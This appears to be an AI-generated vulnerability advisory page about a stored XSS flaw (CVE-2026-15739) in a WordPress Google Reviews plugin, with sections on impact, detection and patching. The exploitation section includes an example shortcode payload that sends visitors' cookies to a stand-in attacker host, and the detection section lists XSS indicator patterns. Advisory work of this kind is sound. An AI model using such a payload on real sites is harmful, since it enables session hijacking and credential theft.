
Cloud Vulnerability DB
コミュニティ主導の脆弱性データベース
CVE-2026-15739 is a Stored Cross-Site Scripting (XSS) vulnerability in the Rich Showcase for Google Reviews WordPress plugin (also known as widget-google-reviews, developed by widgetpack/RichPlugins). It affects all versions up to and including 6.9.9, due to insufficient input sanitization and output escaping of the pagination shortcode attribute. The vulnerability was published on July 24, 2026, with a patch released the same day. It carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in how the plugin processes the pagination shortcode attribute without properly sanitizing input or escaping output before rendering it in the browser. Vulnerable code paths have been identified in includes/class-view.php (lines 172 and 336), includes/class-feed-old.php (line 45), and includes/class-feed-shortcode.php (line 33) across plugin versions 6.9.7 and 6.9.8. An authenticated attacker with at least contributor-level WordPress access can embed a malicious script payload within the pagination attribute of the plugin's shortcode, which is then stored in the database and executed in the browser of any user who visits the affected page (GitHub Advisory, Wordfence).
Successful exploitation allows authenticated attackers with contributor-level access or higher to persistently inject arbitrary JavaScript into WordPress pages, which executes in the context of any visitor's browser. This can lead to session hijacking, credential theft, malware distribution, phishing, or site defacement. The scope is changed (S:C in CVSS), meaning the injected script can affect resources beyond the plugin itself, including other browser sessions and site visitors (GitHub Advisory, Wordfence).
pagination attribute, e.g., [widget-google-reviews pagination="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].pagination attribute value is rendered in the HTML output and the injected script executes in their browser, enabling session hijacking or credential theft (GitHub Advisory, Wordfence).wp-admin/post.php or REST API endpoints from contributor-level accounts containing <script> tags or encoded JavaScript within shortcode parameters.wp_posts or wp_postmeta tables containing shortcode entries with the pagination attribute holding JavaScript payloads (e.g., <script>, javascript:, onerror=, onload=).wp-content/plugins/widget-google-reviews/ for unauthorized modifications.Update the Rich Showcase for Google Reviews plugin to version 6.9.10 or later, which addresses the insufficient sanitization and escaping of the pagination shortcode attribute. The patch changeset is available in the WordPress plugin repository (WordPress SVN). As a temporary workaround, restrict contributor-level and higher access to trusted users only, and deploy Web Application Firewall (WAF) rules to detect and block XSS payloads in shortcode attributes (Wordfence, GitHub Advisory).
ソース: このレポートは AI を使用して生成されました
無料の脆弱性評価
9つのセキュリティドメインにわたるクラウドセキュリティプラクティスを評価して、リスクレベルをベンチマークし、防御のギャップを特定します。
パーソナライズされたデモを見る
"私が今まで見た中で最高のユーザーエクスペリエンスは、クラウドワークロードを完全に可視化します。"
"Wiz を使えば、クラウド環境で何が起こっているかを 1 つの画面で確認することができます"
"Wizが何かを重要視した場合、それは実際に重要であることを私たちは知っています。"